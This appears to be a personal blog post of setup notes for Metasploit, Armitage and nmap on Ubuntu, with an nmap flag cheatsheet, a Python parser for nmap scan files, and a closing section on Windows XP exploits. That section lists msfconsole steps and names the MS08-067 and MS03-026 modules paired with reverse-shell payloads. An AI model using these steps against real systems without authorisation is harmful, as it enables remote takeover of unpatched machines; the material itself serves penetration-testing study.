Metasploit, Armitage and NMap Install on Ubuntu 16.04

Yep, very popular hacking tools!

Metasploit
Took the install from Rapid7’s site. It all went very well.

To start they had the command “./msfconsole”, which did not work for me. It started with “msfconsole”. The initial run created the initial database. The “db_status” command also worked.

I did not seem to need to do the “service postgresql start” command. I did a search and received a message: Module database cache not built yet, using slow search. To build the cache do “db_rebuild_cache”. This worked. Now my searches work.

search WordPress
67 WordPress vulnerabilities
search drupal
6 Drupal vulnerabilities

Armitage
Downloaded from http://www.fastandeasyhacking.com and installed into /home.
Armitage looks for the database.yml file, located in the /home/.msf4 directory, so the MSF_DATABASE_CONFIG variable needs to be set.
-set the environment variable:
$ export MSF_DATABASE_CONFIG=~/.msf4/database.yml
-Armitage also reads a password from the database.yml file. Edit it: the password field is blank, so add a password and save.
-./armitage, and it will start up.
-permanently set the environment variable: https://askubuntu.com/questions/58814/how-do-i-add-environment-variables https://help.ubuntu.com/community/EnvironmentVariables
-check the environment variable: printenv
-set it in .bashrc: https://www.digitalocean.com/community/tutorials/how-to-read-and-set-environmental-and-shell-variables-on-a-linux-vps

NMap
Also installed nmap with “sudo apt-get install nmap”. Excellent videos from thenewboston.
nmap site-name or IP-address
States: open, filtered (firewall protected), unfiltered (reachable, but nmap cannot tell whether it is open or closed), closed (responds but no service listening)

Indepth scan: OS, versions, traceroute
nmap -A
return service and version
nmap -sV
fast
nmap -F
specific ports
nmap -p number-of-port/service-name ip
Only display open ports
nmap --open
OS
nmap -O
save to a file
nmap -oN file-name
verbose
nmap -v
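As an added example (not part of the original post and not nmap's own code), here is a small Python parser for the “normal” output that -oN writes to a file. It pulls out each host's ports with their states, so the open/filtered/unfiltered/closed distinction above can be summarised and any open port outside an expected allowlist flagged. The scan text is a constructed sample, not a real scan, and the allowlist of intended ports is an assumption.

```python
import re
from collections import Counter

# Constructed sample of nmap "normal" (-oN) output; not from a real scan.
SAMPLE_ON = """\
# Nmap 7.60 scan initiated Mon Jan  1 00:00:00 2018 as: nmap -sV -oN scan.txt 192.0.2.10 192.0.2.11
Nmap scan report for 192.0.2.10
Host is up (0.0010s latency).
Not shown: 995 closed ports
PORT     STATE         SERVICE      VERSION
22/tcp   open          ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open          http         Apache httpd 2.4.18 ((Ubuntu))
445/tcp  filtered      microsoft-ds
8080/tcp open|filtered http-proxy
9929/tcp unfiltered    nping-echo

Nmap scan report for 192.0.2.11
Host is up (0.0020s latency).
All 1000 scanned ports on 192.0.2.11 are closed

Nmap done: 2 IP addresses (2 hosts up) scanned in 3.21 seconds
"""

# "Nmap scan report for host (1.2.3.4)" or "Nmap scan report for 1.2.3.4"
HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\d+\.\d+\.\d+\.\d+)\))?")
# "22/tcp   open   ssh   OpenSSH ..."; the VERSION column is optional (only with -sV)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_normal_output(text):
    """Map each scanned host to a list of port records parsed from -oN text."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(2) or m.group(1)  # prefer the IP when a hostname is shown
            hosts[current] = []
            continue
        if current is None:
            continue  # header lines before the first host report
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            hosts[current].append({
                "port": int(port),
                "proto": proto,
                "state": state,  # open, closed, filtered, unfiltered, open|filtered, ...
                "service": service,
                "version": (version or "").strip(),
            })
    return hosts


def state_summary(hosts):
    """Count listed ports per state across all hosts (the 'Not shown' bulk is excluded)."""
    counts = Counter(p["state"] for ports in hosts.values() for p in ports)
    return dict(counts)


def open_ports(hosts):
    """Ports nmap reported as definitely open, per host."""
    return {h: sorted(p["port"] for p in ports if p["state"] == "open")
            for h, ports in hosts.items()}


def unexpected_open(hosts, allowed):
    """Hosts exposing open ports outside the allowlist; the allowlist is an assumed policy."""
    result = {}
    for host, ports in open_ports(hosts).items():
        extra = [p for p in ports if p not in allowed]
        if extra:
            result[host] = extra
    return result


if __name__ == "__main__":
    parsed = parse_normal_output(SAMPLE_ON)
    print("states:", state_summary(parsed))
    print("open:", open_ports(parsed))
    # Assumed allowlist: only SSH is meant to be reachable on these hosts.
    print("unexpected:", unexpected_open(parsed, {22}))
```

Point parse_normal_output at the contents of the file written by “nmap -oN file-name” to run it against a real scan; note that “open|filtered” is kept as its own state rather than being counted as open, since nmap could not confirm a listener there.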

Win XP Exploits

search for your exploit
-find info
info exploit-name
use exploit-name
show options
set RHOST ipaddress
show payloads
set payload paste-whatever

http://www.binarytides.com/hack-windows-xp-metasploit/
MS08-067 kb958644
exploit/windows/smb/ms08_067_netapi
windows/meterpreter/reverse_tcp
check for patch kb958644

MS11-006 kb2483185

https://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp-0134709/
exploit/windows/dcerpc/ms03_026_dcom
generic/shell_reverse_tcp

On Win XP, from DOS, list hidden and system files: dir /a:hd
-send to file “dir > file-name”
